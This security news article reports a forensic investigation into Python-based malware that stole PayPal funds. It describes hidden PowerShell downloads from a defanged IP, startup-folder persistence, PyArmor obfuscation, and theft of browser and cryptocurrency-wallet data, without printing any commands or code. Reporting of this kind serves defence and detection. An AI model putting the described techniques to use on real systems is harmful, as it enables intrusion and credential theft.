A sophisticated Python-based malware deployment uncovered during a fraud investigation has revealed a layered attack involving obfuscation, disposable infrastructure and commercial offensive tools.

The discovery was made by the Secuinfra Falcon Team after a user reported unusual desktop behaviour and unauthorised PayPal transfers.

The case began when the victim noticed "strange black windows" appearing briefly on screen and captured screenshots.

Those images showed fragments of a command script that had failed to fully suppress its output, exposing evidence of payload decoding and execution.

Initial Infection and PowerShell Activity

Secuinfra investigated the compromised system. Logs revealed repeated use of PowerShell commands configured to run in hidden mode with execution policy bypassed. One command retrieved a file named "svchoss.exe" from the IP address 43.156.63[.]124 and saved it to a temporary directory, mimicking the legitimate Windows process svchost.exe.

The IP address is associated with Autonomous System 132203, labelled "Tencent Building, Kejizhongyi Avenue" and the infrastructure sits within networks linked to Tencent. Researchers noted that such hosting locations are frequently abused for command-and-control (C2) operations.

Additional downloads included batch and Visual Basic (VB) scripts placed in startup folders to maintain persistence. Memory analysis later confirmed the presence of a concealed Python environment deployed under %LOCALAPPDATA%\Microsoft\SystemCache25.

Read more on Python malware techniques: Malicious Machine Learning Model Attack Discovered on PyPI

Memory Forensics, Obfuscation and Credential Theft 

Although disk imaging was not possible, investigators analysed memory dumps using Volatility 3 and string extraction tools. More than 5000 relevant indicators of compromise were identified before filtering. Among them were references to python.exe, xro.py and several encoded binary files.

Further pivoting on the identified IP address uncovered multiple malicious payloads hosted on the same server:

• XWorm RAT v5.6

• HTran tunnelling tool

• Cobalt Strike Beacon

• A PyInstaller-packed executable named svchoss.exe

The Cobalt Strike sample was confirmed as a beacon communicating with the same server from which it was downloaded. VirusTotal detections for svchoss.exe reached 41 out of 71 engines as of December 5th 2025.

Analysis of the PyInstaller sample revealed heavy obfuscation. Techniques included falsified Python version metadata, altered magic bytes, misleading filenames and the use of PyArmor. Extracted strings indicated attempts to access Chromium autofill data, cryptocurrency wallets and Mozilla Firefox profiles, suggesting credential theft functionality.

Investigators concluded the system had been fully compromised, though the initial infection vector could not be confirmed. Social engineering, malicious downloads or email-based delivery remain the most likely entry points.